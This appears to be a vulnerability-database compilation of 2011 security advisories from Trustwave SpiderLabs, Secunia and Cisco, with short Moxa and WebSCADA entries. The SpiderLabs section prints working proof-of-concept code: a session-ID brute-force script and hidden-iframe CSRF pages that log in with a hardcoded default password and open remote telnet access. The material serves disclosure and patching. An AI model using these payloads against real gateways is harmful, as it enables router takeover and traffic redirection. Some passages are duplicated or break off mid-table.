start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0083 | CVE-2011-0885 | SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0386 | No CVE | Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition
| VAR-201102-0225 | CVE-2011-0385 | Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary files on the webserver.
This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence
Recording Server. The defect
that is related to each component is covered in each associated
advisory. The defect
that is related to each component is covered in each associated
advisory. The defect that is related to each component is
covered in each associated advisory. The defect that
is related to each component is covered in each associated advisory.
All releases of Cisco TelePresence software prior to 1.7.1 are
affected by one or more of the vulnerabilities listed in this
advisory.
To determine the current version of software that is running on the
Cisco TelePresence Recording Server, SSH into the device and issue the
show version active and the show version inactive commands. The
output should resemble the following example:
admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
In the preceding example, the system has versions 1.6.2 and 1.7.0
loaded on the device and version 1.7.0 is currently active. A device
is affected only by vulnerabilities that are present in the active
software version.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The Cisco TelePresence solution allows for immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners even when they are located in opposite
hemispheres. These vulnerabilities are
independent of each other.
Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users.
* Cisco TelePresence Recording Server - CSCtf42005 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
* Cisco TelePresence Recording Server - CSCtf97221 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0382.
* Cisco TelePresence Recording Server - CSCth85786 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0385. This vulnerability could be leveraged to obtain full
control of the affected device.
* Cisco TelePresence Recording Server - CSCti50739 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0386. This vulnerability could allow
an unauthenticated, adjacent attacker to trigger a buffer overflow
condition.
Because Cisco Discovery Protocol works at the data-link layer (Layer
2), an attacker must have a way to submit an Ethernet frame directly
to an affected device. This may be possible in situations where the
affected system is part of a bridged network or connected to a
nonpartitioned device such as a network hub.
* Cisco TelePresence Recording Server - CSCtd75769 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0379.
Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices. A restart of the affected
device may be required to regain functionality.
* Cisco TelePresence Recording Server - CSCtf97205 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0391.
Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices due to a failure to properly restrict access
to the RMI interface of the Java Servlet framework. An
unauthenticated, remote attacker could trigger an out-of-memory
condition on the Servlet host by issuing a series of crafted
requests.
* Cisco TelePresence Recording Server - CSCtg35830 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0388. This vulnerability could allow an
unauthenticated, remote attacker to perform a limited number of
actions on the system that should be restricted to authorized users.
* Cisco TelePresence Recording Server - CSCtg35833 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0392.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Cisco Security Advisory is done in accordance with
CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCtf42005 - Unauthenticated Java Servlet Access
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97221 - CGI Command Injection
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCth85786 - Unauthenticated Arbitrary File Upload
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCti50739 - XML-RPC Arbitrary File Overwrite
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
CVSS Base Score - 7.9
Access Vector - Adjacent Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 6.5
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97205 - Ad Hoc Recording Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35830 - Java RMI Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35833 - Unauthenticated XML-RPC Interface
CVSS Base Score - 7.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the
affected device. In some instances
this issue could be leveraged to gain complete control of the
affected system.
Successful exploitation of the Cisco Discovery Protocol Remote Code
Execution (CSCtd75769) vulnerability could allow an unauthenticated,
adjacent attacker to take complete control of the affected system.
Successful exploitation of the Ad Hoc Recording Denial of Service
(CSCtf97205) vulnerability could allow an unauthenticated, remote
attacker to cause a persistent denial of service condition on an
affected device.
Successful exploitation of the Java RMI Denial of Service
(CSCtg35830) vulnerability could allow an unauthenticated, remote
attacker to cause all web-based services to become inaccessible.
Successful exploitation of the Unauthenticated XML-RPC Interface
(CSCtg35833) vulnerability could allow an unauthenticated, remote
attacker to perform a number of actions that should be restricted to
authenticated users.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following Cisco TelePresence System Software table
defines a specific defect, the first fixed release, and the
recommended release to resolve all the security issues identified in
this advisory as well as other non-security-related issues. Cisco
recommends upgrading to a release equal to or later than the release
in the Recommended Release column of the table.
Workarounds
===========
There are no device- or system-based workarounds for the identified
vulnerabilities.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers,
and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
All vulnerabilities identified within this Security Advisory were
discovered internally by Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/
+eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf
=xAVI
-----END PGP SIGNATURE-----
.
Revision History
================
+----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release
| VAR-201102-0182 | CVE-2010-4741 |
Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201011-0390 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321.
An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
| VAR-201102-0174 | CVE-2010-4733 | WebSCADA Multiple Product Weak Password Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface
| VAR-201102-0197 | CVE-2010-4730 | WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
